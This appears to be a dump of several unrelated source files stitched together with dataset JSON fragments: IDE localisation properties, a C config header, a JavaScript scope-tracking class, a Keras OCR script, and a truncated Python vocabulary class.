found\nparameter.info.no.parameters=\nxml.tag.info.no.attributes=\nn.of.m={0} of {1}\nquick.definition.back=Back\nquick.definition.forward=Forward\nquick.definition.edit.source=Edit Source\nquick.definition.show.source=Show Source\ni18n.quickfix.property.panel.title=Property Info\ni18n.quickfix.property.panel.update.all.files.in.bundle.checkbox=Update all properties files in &Resource bundle\ni18n.quickfix.property.panel.properties.file.label=&Properties File:\ni18n.quickfix.property.panel.property.value.label=Property &Value:\ni18n.quickfix.property.panel.property.key.label=Property &Key:\ni18n.quickfix.code.panel.title=Java Code Info\ni18n.quickfix.code.panel.resource.bundle.expression.label=Resource bundle &expression:\ni18n.quickfix.preview.panel.title=Preview\nquickfix.i18n.concatentation=I18nize string concatenation containing hard coded string literal\nquickfix.i18n.concatentation.error=String concatenation not found\nquickfix.i18n.command.name=I18nize\ninspection.i18n.display.name=Hard coded strings\ninspection.i18n.option.ignore.assert=Ignore for assert statement arguments\ninspection.i18n.option.ignore.for.exception.constructor.arguments=Ignore for exception constructor arguments:\ninspection.i18n.option.ignore.for.specified.exception.constructor.arguments=Ignore for specified exception constructor arguments\ninspection.i18n.option.ignore.for.junit.assert.arguments=Ignore for JUnit assert arguments\ninspection.i18n.option.ignore.qualified.class.names=Ignore literals which have value equal to existing qualified class name\ninspection.i18n.option.ignore.property.keys=Ignore literals which have value equal to existing property key\ninspection.i18n.option.ignore.nonalphanumerics=Ignore literals which do not contain alphabetic characters\ninspection.i18n.quickfix=I18nize hard coded string literal\ninspection.i18n.message.general.with.value=Hard coded string literal: {0}\ninspection.unresolved.property.key.reference.name=Invalid property key\ninspection.unresolved.property.key.reference.message=String literal ''{0}'' doesn''t appear to be valid property key\ninspection.invalid.resource.bundle.reference=Invalid resource bundle reference ''{0}''\ni18nize.dialog.title=I18nize Hardcoded String\ni18nize.dialog.error.jdk.message=Class 'java.util.ResourceBundle' cannot be found.\\nPlease setup correct JDK.\ni18nize.dialog.error.jdk.title=Class Not Found\ni18nize.dialog.property.file.chooser.title=Choose Properties File\ni18nize.dialog.template.link.label=Edit I18n template\ni18nize.dialog.error.property.already.defined.message=Property ''{0}'' already exists in the file ''{1}''\ni18nize.dialog.error.property.already.defined.title=Property Already Exists\nintention.split.declaration.family=Split Declaration\nintention.split.declaration.text=Split into separate declarations\nintention.split.declaration.assignment.text=Split into declaration and assignment\nintention.add.override.annotation=Add '@Override' Annotation\nintention.add.override.annotation.family=Add Override Annotation\nintention.make.type.generic.family=Make Type Generic\nintention.make.type.generic.text=Change type of {0} to {1}\nintention.split.if.family=Split If\nintention.split.if.text=Split into 2 if's\nintention.introduce.variable.text=Introduce local variable\nintention.encapsulate.field.text=Encapsulate field\nintention.implement.abstract.method.family=Implement Abstract Method\nintention.implement.abstract.method.text=Implement method ''{0}''\nintention.override.method.text=Override method ''{0}''\nintention.add.annotation.family=Add Annotation\nintention.add.on.demand.static.import.family=Add On Demand Static Import\nintention.add.on.demand.static.import.text=Add on demand static import for ''{0}''\nintention.add.single.member.static.import.family=Add Single-Member Static Import\nintention.add.single.member.static.import.text=Add static import for ''{0}''\nintention.replace.concatenation.with.formatted.output.family=Replace Concatenation with Formatted Output\nintention.replace.concatenation.with.formatted.output.text=Replace '+' with 'java.text.MessageFormat.format()'\nintention.color.chooser.dialog=Choose Color\nintention.convert.to.basic.latin=Convert to Basic Latin\nintention.surround.resource.with.ARM.block=Surround with try-with-resources block\ndialog.create.field.from.parameter.title=Create Field\ndialog.create.field.from.parameter.already.exists.text=Use existing field ''{0}''?\ndialog.create.field.from.parameter.already.exists.title=Field Already Exists\ndialog.create.field.from.parameter.field.type.label=Field of type:\ndialog.create.field.from.parameter.field.name.label=Name:\ndialog.create.field.from.parameter.declare.final.checkbox=Declare &final\ndialog.create.class.destination.package.label=Destination package:\ndialog.create.class.package.chooser.title=Choose Destination Package\ncreate.directory.command=Create directory\ndialog.create.class.label=Create {0}:\ndialog.create.class.name=Create {0} {1}\nintention.implement.abstract.class.family=Implement Abstract Class or Interface\nintention.implement.abstract.class.default.text=Implement Abstract Class\nintention.implement.abstract.class.interface.text=Implement Interface\nintention.implement.abstract.class.subclass.text=Create Subclass\nintention.error.cannot.create.class.message=Cannot Create Class ''{0}''\nintention.error.cannot.create.class.title=Failed to Create Class\nintention.assign.field.from.parameter.text=Assign Parameter to Field ''{0}''\nintention.assign.field.from.parameter.family=Assign Parameter to Field\nintention.create.field.from.parameter.text=Create Field for Parameter ''{0}''\nintention.create.field.from.parameter.family=Create Field for Parameter\nintention.bind.fields.from.parameters.text=Bind {0} Parameters to Fields\nintention.bind.fields.from.parameters.family=Bind Parameters to Fields\nintention.implement.abstract.method.searching.for.descendants.progress=Searching For Descendants...\nintention.implement.abstract.method.error.no.classes.message=There are no classes found where this method can be implemented\nintention.implement.abstract.method.error.no.classes.title=No Classes Found\nintention.implement.abstract.method.class.chooser.title=Choose Implementing Class\nintention.implement.abstract.method.command.name=Implement method\nintention.invert.if.condition=Invert If Condition\nintention.extract.if.condition.text=Extract if ({0})\nintention.extract.if.condition.family=Extract If Condition\nintention.underscores.in.literals.family=Underscores in numeric literals\nintention.remove.literal.underscores=Remove underscores from literal\nintention.insert.literal.underscores=Insert underscores into literal\nintention.replace.cast.with.var.text=Replace ''{0}'' with ''{1}''\nintention.replace.cast.with.var.family=Replace cast with variable\nintention.convert.color.representation.text=Convert to ''new Color{0}''\nintention.convert.color.representation.family=Convert Color representation\nintention.break.string.on.line.breaks.text=Break string on '\\\\n'\n\n\nintention.create.test=Create Test\nintention.create.test.dialog.testing.library=Testing library:\nintention.create.test.dialog.language=Language:\nintention.create.test.dialog.class.name=Class name:\nintention.create.test.dialog.super.class=Superclass:\nintention.create.test.dialog.choose.super.class=Choose Superclass\nintention.create.test.dialog.generate=Generate:\nintention.create.test.dialog.show.inherited=Show inherited methods\nintention.create.test.dialog.select.methods=Generate test methods for:\nintention.create.test.dialog.library.not.found={0} library not found in the module\nintention.create.test.dialog.fix.library=Fix\nintention.create.test.dialog.java=Java\n\nlightbulb.tooltip=Click or press {0}\ndialog.intention.settings.intention.list.title=Intention List\ndialog.intention.settings.description.panel.title=Description\ndialog.intention.settings.description.usage.example.title=Usage Example\nintention.settings=Intentions\nintention.settings.category.text=\\\n
You have selected the intention category ''{0}''.
\\\n
By clicking the checkbox, you can enable/disable all intentions in this category.
\\\n
To enable/disable a particular intention, select the intention inside this category.
\\\n
\njavadoc.description.copied.from.interface=Description copied from interface:\njavadoc.description.copied.from.class=Description copied from class:\njavadoc.deprecated=Deprecated\njavadoc.since=Since:\njavadoc.see.also=See Also:\njavadoc.parameters=Parameters:\njavadoc.returns=Returns:\njavadoc.throws=Throws:\njavadoc.method.in.interface={0} in interface {1}\njavadoc.method.in.class={0} in class {1}\njavadoc.method.overrides=Overrides:\njavadoc.method.specified.by=Specified by:\njavadoc.external.fetch.error.message=Cannot fetch remote documentation: {0}\nsearching.for.implementations=Searching For Implementations...\n\ngoto.implementation.chooserTitle=Choose Implementation of {0} ({1} found)\ngoto.implementation.findUsages.title=Implementations of {0}\ngoto.implementation.notFound=No implementations found\n\ngoto.test.chooserTitle.test=Choose Test for {0} ({1} found)\ngoto.test.findUsages.test.title=Tests for {0}\ngoto.test.chooserTitle.subject=Choose Test Subject for {0} ({1} found)\ngoto.test.findUsages.subject.title=Test Subjects for {0}\ngoto.test.notFound=No test subjects found\n\nincremental.search.tooltip.prefix=Search for:\ngoto.super.method.chooser.title=Choose super method\ngoto.super.method.findUsages.title=Super methods of {0}\ngoto.super.class.chooser.title=Choose super class or interface\njavadoc.action.back=Back\njavadoc.action.forward=Forward\njavadoc.action.view.external=View External Documentation\njavadoc.documentation.not.found.message=The documentation for this element is not found.\\nPlease add all the needed paths to API docs in Project Settings.\njavadoc.documentation.not.found.title=No Documentation\njavadoc.fetching.progress=Fetching Documentation...\nno.documentation.found=No documentation found.\njavadoc.candiates=Candidates for method call {0} are:

{1}\njavadoc.candidates.not.found=No candidates found for method call {0}.\ndeclaration.navigation.title=Choose Declaration\ntemplate.shortcut.enter=Enter\ntemplate.shortcut.tab=Tab\ntemplate.shortcut.space=Space\ndialog.edit.live.template.title=Edit Live Template\ndialog.add.live.template.title=Add Live Template\ntemplates.no.defined=No templates defined in this context\ntemplates.surround.no.defined=No surround templates defined in this context\ntemplates.no.defined.with.prefix=No templates starting with ''{0}'' defined in this context\ntemplates.settings.page.title=Live Templates\ntemplates.select.template.chooser.title=Select Template\ntemplates.export.display.name=Live templates\ntemplates.dialog.edit.variables.title=Edit Template Variables\ntemplates.dialog.edit.variables.border.title=Variables\ntemplates.dialog.edit.variables.action.move.up=Move &Up\ntemplates.dialog.edit.variables.action.move.down=Move &Down\ntemplates.dialog.edit.variables.table.column.name=Name\ntemplates.dialog.edit.variables.table.column.expression=Expression\ntemplates.dialog.edit.variables.table.column.default.value=Default value\ntemplates.dialog.edit.variables.table.column.skip.if.defined=Skip if defined\ntemplates.dialog.table.column.abbreviation=Abbreviation\ntemplates.dialog.table.column.description=Description\ntemplates.dialog.table.column.active=Active\ntemplates.dialog.shortcut.chooser.label=By default expand with\ndialog.copy.live.template.title=Copy Live Template\ndialog.edit.template.shortcut.default=Default ({0})\ndialog.edit.template.template.text.title=&Template text:\ndialog.edit.template.button.edit.variables=&Edit variables\ndialog.edit.template.label.abbreviation=&Abbreviation:\ndialog.edit.template.label.group=&Group:\ndialog.edit.template.label.description=&Description:\ndialog.edit.template.options.title=Options\ndialog.edit.template.label.expand.with=E&xpand with\ndialog.edit.template.checkbox.reformat.according.to.style=&Reformat according to style\ndialog.edit.template.checkbox.shorten.fq.names=Shorten &FQ names\ndialog.edit.template.checkbox.use.static.import=Use static &import if possible\ndialog.edit.template.context.title=Context\ndialog.edit.template.checkbox.html=&HTML\ndialog.edit.template.checkbox.xml=&XML\ndialog.edit.template.checkbox.jsp=JS&P\ndialog.edit.template.checkbox.smart.type.completion=Smart type c&ompletion\ndialog.edit.template.error.title=Cannot Save\ndialog.edit.template.error.malformed.abbreviation=Cannot save the template.\\nTemplate abbreviation should contain only letters, digits, dots and hyphens.\ndialog.edit.template.error.already.exists=Cannot save the template.\\nTemplate with the abbreviation \\\"{0}\\\"\\nalready exists in group \\\"{1}\\\".\\nPlease choose a different abbreviation or group.\nfinish.template.command=Finish Template\ninsert.code.template.command=Insert Code Template\ntemplate.next.variable.command=Go to Next Code Template Tab\ntemplate.previous.variable.command=Go to Previous Code Template Tab\nmacro.array.variable=arrayVariable()\nmacro.capitalize.string=capitalize(String)\nmacro.cast.to.left.side.type=castToLeftSideType()\nmacro.classname=className()\nmacro.component.type.of.array=componentTypeOf(Array)\nmacro.current.package=currentPackage()\nmacro.decapitalize.string=decapitalize(String)\nmacro.firstWord.string=firstWord(String)\nmacro.undescoresToSpaces.string=underscoresToSpaces(String)\nmacro.undescoresToCamelCase.string=underscoresToCamelCase(String)\nmacro.capitalizeAndUnderscore.string=capitalizeAndUnderscore(String)\nmacro.descendant.classes.enum=descendantClassesEnum(String)\nmacro.enum=enum(...)\nmacro.expected.type=expectedType()\nmacro.groovy.script=groovyScript(\"groovy code\")\nmacro.guess.element.type.of.container=guessElementType(Container)\nmacro.iterable.component.type=iterableComponentType(ArrayOrIterable)\nmacro.iterable.variable=iterableVariable()\nmacro.linenumber=lineNumber()\nmacro.methodname=methodName()\nmacro.method.parameters=methodParameters()\nmacro.qualified.class.name=qualifiedClassName()\nmacro.right.side.type=rightSideType()\nmacro.suggest.index.name=suggestIndexName()\nmacro.suggest.variable.name=suggestVariableName()\nmacro.suggest.first.variable.name=suggestFirstVariableName()\nmacro.variable.of.type=variableOfType(Type)\nmacro.file.name=fileName()\nmacro.file.name.without.extension=fileNameWithoutExtension()\ncommand.name.surround.with.runtime.cast=Surround with runtime cast\ninspection.i18n.expression.is.invalid.error.message=The I18nized Expression template is not a valid expression\ninspection.error.dialog.title=Error\nlivetemplate.description.tag.pair=Tag pair\nlivetemplate.description.itar=Iterate elements of array\nlivetemplate.description.itco=Iterate elements of java.util.Collection\nlivetemplate.description.iten=Iterate java.util.Enumeration\nlivetemplate.description.itit=Iterate java.util.Iterator\nlivetemplate.description.itli=Iterate elements of java.util.List\nlivetemplate.description.ittok=Iterate tokens from String\nlivetemplate.description.itve=Iterate elements of java.util.Vector\nlivetemplate.description.ritar=Iterate elements of array in reverse order\nlivetemplate.description.iter=Iterate Iterable | Array in J2SDK 5.0 syntax\nlivetemplate.description.itover=Iterate over an Iterable or Array selection in J2SDK 5.0 syntax\nlivetemplate.description.inst=Checks object type with instanceof and down-casts it\nlivetemplate.description.lst=Fetches last element of an array\nlivetemplate.description.mn=Sets lesser value to a variable\nlivetemplate.description.mx=Sets greater value to a variable\nlivetemplate.description.psvm=main() method declaration\nlivetemplate.description.toar=Stores elements of java.util.Collection into array\nlivetemplate.description.lazy=Performs lazy initialization\nlivetemplate.description.if.not.null=Inserts ''if not null'' statement\nlivetemplate.description.if.null=Inserts ''if null'' statement\nlivetemplate.description.geti=Inserts singleton method getInstance\nlivetemplate.description.serr=Prints a string to System.err\nlivetemplate.description.sout=Prints a string to System.out\nlivetemplate.description.souf=Prints a formatted string to System.out\nlivetemplate.description.soutm=Prints current class and method names to System.out\nlivetemplate.description.soutp=Prints method parameter names and values to System.out\nlivetemplate.description.soutv=Prints a value to System.out\nlivetemplate.description.st=String\nlivetemplate.description.psf=public static final\nlivetemplate.description.psfi=public static final int\nlivetemplate.description.psfs=public static final String\nlivetemplate.description.thr=throw new\nlivetemplate.description.surround.braces=Surround with {}\nlivetemplate.description.surround.parens=Surround with ()\nlivetemplate.description.surround.tag=Surround with \nlivetemplate.description.surround.tag.in.htmlorjsp=Surround with in HTML/JSP\nlivetemplate.description.surround.cdata.in.xmlorhtmlorjsp=Surround with CDATA section\nlivetemplate.description.surround.with.callable=Surround with Callable\nlivetemplate.description.surround.with.read.lock=Surround with ReadWriteLock.readLock\nlivetemplate.description.surround.with.write.lock=Surround with ReadWriteLock.writeLock\nquickfix.add.variable.text=Initialize variable ''{0}''\nquickfix.add.variable.family.name=Initialize variable\ninspection.i18n.quickfix.annotate.as=Annotate as @{0}\ninspection.i18n.quickfix.annotate.element.as=Annotate {0} ''{1}'' as @{2}\ndisable.intention.action=Disable ''{0}''\nenable.intention.action=Enable ''{0}''\nunder.construction.string=Under construction.\ninspection.i18n.option.ignore.comment.pattern=Ignore lines containing this comment (pattern in java.util.Pattern format):\ninspection.i18n.option.ignore.comment.title=Non-Nls comment pattern\ninspection.i18n.option.ignore.assigned.to.constants=Ignore literals assigned to constants\ninspection.i18n.option.ignore.tostring=Ignore contents of toString() method\nintention.move.initializer.to.constructor=Move initializer to constructor\nintention.move.initializer.to.set.up=Move initializer to setUp method\nintention.move.field.assignment.to.declaration=Move assignment to field declaration\ni18nize.jsp.error=Please select JSP text to I18nize.\\nMake sure you have not selected any scriptlets, custom tags or other foreign languages elements.\\nAlso, HTML tags inside selection must be balanced.\ni18nize.error.title=Cannot I18nize Selection\ni18nize.error.message=You can only i18nize Java string literal or substring thereof.\\nPlease point the caret inside Java string literal or select part of it.\ndisplay.coverage.prompt=Do you want to display coverage data for ''{0}''?\ncode.coverage=Code Coverage\ncoverage.button.add.package=Add Package\ncoverage.pattern.filter.editor.choose.package.title=Choose Package\nno.coverage=No coverage\ncode.coverage.is.not.supported=Code coverage is supported for jre 5.0 or higher\ntitle.popup.show.coverage=Coverage Suites\nprompt.remove.coverage=Do you want to remove ''{0}'' coverage data?\ntitle.remove.coverage.data=Remove Coverage Data\ncoverage.data.outdated=Coverage data outdated\ncoverage.data.not.found=Coverage data not found\nerror.cannot.resolve.class=Cannot resolve class ''{0}''\nimplementation.view.title=Definition of {0}\njavadoc.info.title=Documentation for {0}\nintention.intercept.ejb.method.or.class.family=Add EJB interceptor\nintention.intercept.ejb.method.or.class.class.text=Add interceptor for EJB class ''{0}''\nintention.intercept.ejb.method.or.class.method.text=Add interceptor for business method ''{0}''\nintention.edit.interceptor.binding.family=Interceptor Bindings\nintention.edit.interceptor.binding.text=Edit Interceptor ''{0}'' bindings\npowered.by=Powered by\npowered.by.plugin=''{0}'' plugin.\nerror.cannot.convert.default.message=Invalid value: ''{0}''\nerror.cannot.resolve.default.message=Cannot resolve symbol ''{0}''\nerror.cannot.resolve.0.1=Cannot resolve {0} ''{1}''\nerror.unknown.enum.value.message=Unknown enum value ''{0}''\nunknown.encoding.0=Unknown encoding: ''{0}''\ni18nize.cant.create.properties.file.because.its.name.is.associated=Can''t create properties file ''{0}'' because its name is associated with the {1}.\ni18nize.error.creating.properties.file=Error creating properties file\nnode.method.tooltip=Method\nnode.field.tooltip=Field\nnode.annotation.tooltip=Annotation\nnode.anonymous.class.tooltip=Anonymous Class\nnode.enum.tooltip=Enum\nnode.exception.tooltip=Exception\nnode.interface.tooltip=Interface\nnode.junit.test.tooltip=JUnit Test\nnode.runnable.class.tooltip=Runnable Class\nnode.class.tooltip=Class\nnode.excluded.flag.tooltip=Excluded\nnode.abstract.flag.tooltip=Abstract\nnode.final.flag.tooltip=Final\nnode.static.flag.tooltip=Static\nmultiple.implementations.tooltip=Multiple implementations\nstatic.class.initializer={0}class initializer\n\n# suppress inspection \"UnusedProperty\"\nintentions.category.ejb=EJB\nset.language.level=Set language level\nset.language.level.to.0=Set language level to {0}\nremove.annotation=Remove annotation\ndeannotate.intention.action.text=Deannotate\ndeannotate.intention.chooser.title=Choose annotation to delete\njavadoc.type.parameters=Type parameters:\nhighlight.overridden.classes.chooser.title=Choose Classes to Highlight Overridden Methods from\nno.methods.overriding.0.are.found=No methods overriding {0, choice, 0#|1# '{1}'|2#these classes} are found\ncopy.abstract.method.no.existing.implementations.found=No existing implementations found\ncopy.abstract.method.intention.name=Use existing implementation of ''{0}''\ncopy.abstract.method.popup.title=Choose implementation to copy\ncopy.abstract.method.title=Use Abstract Method Implementation\ni18nize.empty.file.path=Please specify properties file path\nchoose.type.popup.title=Choose Type\ncast.expression=Cast expression\ncast.to.0=Cast to ''{0}''\nclass.completion.file.path=Press {0} again to search for all matching project files\nclass.completion.file.path.all.variants=Press {0} to search for matching files of any type\nproperty.has.more.parameters.than.passed=Property ''{0}'' expected {1} {1, choice, 1#parameter|2#parameters}, passed {2}\ncreate.file.family=Create File\nrename.file.reference.family=Rename File Reference\nrename.file.reference.text=Rename File Reference to {0}\ncreate.directory.text=Create Directory {0}\ncreate.file.text=Create File {0}\ncreate.tagfile.text=Create Tag File {0}\nrename.file.fix=Rename File\nrename.element.family=Rename Element\nrename.public.class.text=Rename class ''{0}'' to ''{1}''\nrename.named.element.text=Rename ''{0}'' to ''{1}''\ndialog.edit.template.checkbox.html.text=HTML Text\ndialog.edit.template.checkbox.xsl.text=XSL Text\n\njavadoc.error.resolving.url=Couldn''t resolve URL {0}

Configuring paths to API docs in project settings might help\n\nblock.comment.intersects.existing.comment=Selected region intersects existing comment\nblock.comment.wrapping.suffix=Selected region contains block comment suffix\nblock.comment.nested.comment=Selected region contained block {0, choice, 1#comment|2#comments},\\nsurrounding ranges were commented.\n\npopup.title.next.error.action.0.goes.through=''Next Error'' Action{0} Goes Through\n\nparameter.info.switch.overload.shortcuts=Switch with {0} or {1}\nparameter.info.switch.overload.shortcuts.single=Switch with {0}\n\nparameter.info.progress.title=Calculating parameter info...\nparameter.info.indexing.mode.not.supported=Parameter Info is unavailable during indexing\n"} {"text": "\n/**\n * @file /magma/objects/config/config.h\n *\n * @brief\tThe user configuration interface.\n */\n\n#ifndef MAGMA_OBJECTS_CONFIG_H\n#define MAGMA_OBJECTS_CONFIG_H\n\ntypedef struct __attribute__ ((packed)) {\n\tuint64_t flags;\n\tstringer_t *key, *value;\n} user_config_entry_t;\n\n// Possible flag values for user config entries.\nenum {\n\tUSER_CONF_STATUS_NONE = 0,\n\tUSER_CONF_STATUS_CRITICAL = 1\n};\n\ntypedef struct __attribute__ ((packed)) {\n\tinx_t *entries;\n\tuint64_t usernum, serial;\n} user_config_t;\n\n/// config.c\nuser_config_t * user_config_alloc(uint64_t usernum);\nuser_config_t * user_config_create(uint64_t usernum);\nint_t user_config_edit(user_config_t *collection, stringer_t *key, stringer_t *value);\nuser_config_entry_t * user_config_entry_alloc(stringer_t *key, stringer_t *value, uint64_t flags);\nvoid user_config_entry_free(user_config_entry_t *entry);\nvoid user_config_free(user_config_t *collection);\nint_t user_config_update(user_config_t *collection);\n\n/// datatier.c\nint_t user_config_delete(uint64_t usernum, stringer_t *key);\nbool_t user_config_fetch(user_config_t *collection);\nint_t user_config_upsert(uint64_t usernum, stringer_t *key, stringer_t *value, uint64_t flags);\n\n#endif\n\n"} {"text": "\n\n"} {"text": "\n"} {"text": "/* @flow */\n\nimport type Node from '../../elements/Node';\nimport Reference from './Reference';\nimport Variable from './Variable';\nimport {default as Definition, types, typeOrder} from './Definition';\nimport toArray from '../../utils/toArray';\n\nexport default class Scope {\n constructor(scopeInfo: ScopeInfo) {\n let {node, parentScope, isProgramScope, isFunctionScope, isClassScope, isArrowFunctionScope} = scopeInfo;\n\n this.node = node;\n this.parentScope = parentScope;\n if (parentScope) {\n parentScope.childScopes.push(this);\n this._depth = parentScope._depth + 1;\n } else {\n this._depth = 0;\n }\n this.childScopes = [];\n this._variables = new Map();\n this._references = new Map();\n this._isProgramScope = Boolean(isProgramScope);\n this._isFunctionScope = Boolean(isFunctionScope);\n this._isClassScope = Boolean(isClassScope);\n this._isArrowFunctionScope = Boolean(isArrowFunctionScope);\n\n if (isProgramScope) {\n this._programReferences = new Map();\n this._programDefinitions = new Map();\n }\n }\n\n _isProgramScope: boolean;\n _isFunctionScope: boolean;\n _isClassScope: boolean;\n _isArrowFunctionScope: boolean;\n node: Node;\n _depth: number;\n parentScope: ?Scope;\n childScopes: Scope[];\n _variables: Map;\n _references: Map;\n\n _programReferences: Map;\n _programDefinitions: Map;\n\n _addVariable(variable: Variable) {\n let variables = this._variables.get(variable.name);\n if (variables) {\n variables.push(variable);\n variables.sort((variable1: Variable, variable2: Variable) => {\n let typeOrder1 = typeOrder[variable1.type];\n let typeOrder2 = typeOrder[variable2.type];\n if (typeOrder1 > typeOrder2) {\n return 1;\n }\n if (typeOrder1 < typeOrder2) {\n return -1;\n }\n return 0;\n });\n } else {\n this._variables.set(variable.name, [variable]);\n }\n }\n\n _addDefinition(definitionInfo: DefinitionInfo) {\n let {node, name, type} = definitionInfo;\n if (type === types.Variable) {\n if (!this._isFunctionScope && this.parentScope) {\n this.parentScope._addDefinition(definitionInfo);\n return;\n }\n }\n\n let variables = this._variables.get(name) || [];\n let variable: ?Variable;\n for (let item of variables) {\n if (item.type === type) {\n variable = item;\n break;\n }\n }\n\n if (!variable) {\n variable = new Variable({name, type, scope: this});\n this._adjustReferencesOnVariableAdd(variable);\n this._addVariable(variable);\n }\n\n let definition = new Definition({node, type, scope: this});\n\n variable._addDefinition(definition);\n\n let programScope = this._getProgramScope();\n if (programScope) {\n programScope._programDefinitions.set(node, definition);\n }\n }\n\n _removeDefinition(definition: Definition) {\n let variable = definition.variable;\n\n variable._removeDefinition(definition);\n\n if (\n variable._definitions.size === 0 &&\n (\n variable.type === 'LetVariable' ||\n variable.type === 'Constant' ||\n variable.type === 'Variable' ||\n variable.type === 'Parameter' ||\n variable.type === 'SelfReference' ||\n variable.type === 'CatchClauseError' ||\n variable.type === 'ImportBinding'\n )\n ) {\n removeVariable(variable);\n }\n\n let programScope = this._getProgramScope();\n if (programScope) {\n programScope._programDefinitions.delete(definition.node);\n }\n }\n\n _adjustReferencesOnVariableAdd(variable: Variable) {\n let depth = variable.scope._depth;\n let references = this._references.get(variable.name);\n if (references) {\n for (let reference of references) {\n let refVar = reference.variable;\n let varDepth = refVar.scope._depth;\n if (varDepth === depth) {\n if (typeOrder[variable.type] < typeOrder[refVar.type]) {\n refVar._transferReferences(variable);\n removeVariableIfRequired(refVar);\n }\n } else if (varDepth < depth) {\n refVar._references.delete(reference);\n variable._addReference(reference);\n reference.variable = variable;\n removeVariableIfRequired(refVar);\n }\n }\n }\n\n for (let childScope of this.childScopes) {\n childScope._adjustReferencesOnVariableAdd(variable);\n }\n }\n\n _addReference(referenceInfo: ReferenceInfo) {\n let {name} = referenceInfo;\n let reference = new Reference({scope: this, ...referenceInfo});\n this._assignReference(reference, name);\n let references = this._references.get(name);\n if (references) {\n references.push(reference);\n } else {\n this._references.set(name, [reference]);\n }\n\n let programScope = this._getProgramScope();\n if (programScope) {\n programScope._programReferences.set(reference.node, reference);\n }\n }\n\n _assignReference(reference: Reference, name: string) {\n let currentScope = this;\n do {\n let variables = currentScope._variables.get(name);\n if (variables) {\n if (reference.type) {\n for (let variable of variables) {\n if (variable.type === reference.type) {\n variable._addReference(reference);\n return;\n }\n }\n } else {\n variables[0]._addReference(reference);\n return;\n }\n }\n if (!currentScope.parentScope) {\n let globalVariable = new Variable({\n name, type: types.ImplicitGlobal, scope: currentScope,\n });\n globalVariable._addReference(reference);\n currentScope._addVariable(globalVariable);\n return;\n } else {\n if (\n (\n (name === 'arguments' || name === 'this') &&\n currentScope._isFunctionScope &&\n !currentScope._isArrowFunctionScope &&\n !currentScope._isProgramScope\n ) ||\n (\n name === 'super' && currentScope._isClassScope\n )\n ) {\n let builtInVariable = new Variable({\n name, type: types.BuiltIn, scope: currentScope,\n });\n builtInVariable._addReference(reference);\n currentScope._addVariable(builtInVariable);\n return;\n }\n currentScope = currentScope.parentScope;\n }\n } while (true);\n }\n\n _removeReference(reference: Reference) {\n let variable = reference.variable;\n let name = variable.name;\n let references = this._references.get(name);\n if (references) {\n let index = references.indexOf(reference);\n if (index !== -1) {\n references.splice(index, 1);\n }\n }\n variable._removeReference(reference);\n if (\n variable._references.size === 0 &&\n (\n variable.type === 'ImplicitGlobal' ||\n variable.type === 'BuiltIn'\n )\n ) {\n removeVariable(variable);\n }\n\n let programScope = this._getProgramScope();\n if (programScope) {\n programScope._programReferences.delete(reference.node);\n }\n }\n\n _getProgramScope(): ?Scope {\n let scope = this;\n while (scope && !scope._isProgramScope) {\n scope = scope.parentScope;\n }\n return scope;\n }\n\n getVariables(): Variable[] {\n return [].concat(...toArray(this._variables.values()));\n }\n\n getReferences(): Reference[] {\n return [].concat(...toArray(this._references.values()));\n }\n\n destroy() {\n let parentScope = this.parentScope;\n if (parentScope) {\n let scopeIndex = parentScope.childScopes.indexOf(this);\n if (scopeIndex !== -1) {\n parentScope.childScopes.splice(scopeIndex, 1);\n }\n }\n this.getReferences().forEach(this._removeReference, this);\n }\n}\n\nfunction removeVariableIfRequired(variable: Variable) {\n if (variable._references.size === 0 && variable._definitions.size === 0) {\n let variables = variable.scope._variables.get(variable.name);\n if (variables) {\n let index = variables.indexOf(variable);\n\n if (index !== -1) {\n variables.splice(index, 1);\n }\n\n if (variables.length === 0) {\n variable.scope._variables.delete(variable.name);\n }\n }\n }\n}\n\nfunction removeVariable(variable: Variable) {\n let scope = variable.scope;\n let variables = scope._variables.get(variable.name);\n\n if (variables) {\n let index = variables.indexOf(variable);\n if (index !== -1) {\n variables.splice(index, 1);\n if (variables.length === 0) {\n scope._variables.delete(variable.name);\n }\n for (let reference of variable._references) {\n reference.scope._assignReference(reference, variable.name);\n }\n }\n }\n}\n\nexport type ReferenceInfo = {\n node: Node,\n name: string,\n read: boolean,\n write: boolean,\n type?: string\n};\n\nexport type DefinitionInfo = {\n node: Node,\n name: string,\n type: string\n};\n\nexport type ScopeInfo = {\n node: Node,\n parentScope: ?Scope,\n isProgramScope?: boolean,\n isFunctionScope?: boolean,\n isClassScope?: boolean,\n isArrowFunctionScope?: boolean\n};\n"} {"text": "#!/usr/bin/env python\n\nimport os\n\nimport keras\nimport numpy\nimport scipy.ndimage\nfrom image_ocr import TextImageGenerator, create_model, ctc_lambda_func\nfrom keras import backend as K\nfrom keras.layers import Lambda\nfrom keras.models import load_model\nfrom keras.utils.data_utils import get_file\n\nimg_h = 64\nimg_w = 512\npool_size = 2\nwords_per_epoch = 16000\nval_split = 0.2\nval_words = int(words_per_epoch * (val_split))\nif K.image_data_format() == 'channels_first':\n input_shape = (1, img_w, img_h)\nelse:\n input_shape = (img_w, img_h, 1)\n\nfdir = os.path.dirname(get_file('wordlists.tgz',\n origin='http://www.mythic-ai.com/datasets/wordlists.tgz', untar=True))\n\nimg_gen = TextImageGenerator(monogram_file=os.path.join(fdir, 'wordlist_mono_clean.txt'),\n bigram_file=os.path.join(fdir, 'wordlist_bi_clean.txt'),\n minibatch_size=32,\n img_w=img_w,\n img_h=img_h,\n downsample_factor=(pool_size ** 2),\n val_split=words_per_epoch - val_words\n )\nprint(f\"Input shape: {input_shape}\")\nmodel, _, _ = create_model(input_shape, img_gen, pool_size, img_w, img_h)\n\nmodel.load_weights(\"my_model.h5\")\n\nx = scipy.ndimage.imread('example.png', mode='L').transpose()\nx = x.reshape(x.shape + (1,))\n\n# Does not work\nprint(model.predict(x, batch_size=1, verbose=0))\n"} {"text": "from .stateful_unit import StatefulUnit\n\n\nclass Vocabulary(StatefulUnit):\n \"\"\"\n Vocabulary class.\n\n :param pad_value: The string value for the padding position.\n :param oov_value: The string value for the out-of-vocabulary terms.\n\n Examples:\n >>> vocab = Vocabulary(pad_value='[PAD]', oov_value='[OOV]')\n >>> vocab.fit(['A', 'B', 'C', 'D', 'E'])\n >>> term_index = vocab.state['term_index']\n >>> term_index # doctest: +SKIP\n {'[PAD]': 0, '[OOV]': 1, 'D': 2, 'A': 3, 'B': 4, 'C': 5, 'E': 6}\n >>> index_term = vocab.state['index_term']\n >>> index_term # doctest: +SKIP\n {0: '[PAD]', 1: '[OOV]', 2: 'D', 3: 'A', 4: 'B', 5: 'C', 6: 'E'}\n\n >>> term_index['out-of-vocabulary-term']\n 1\n >>> 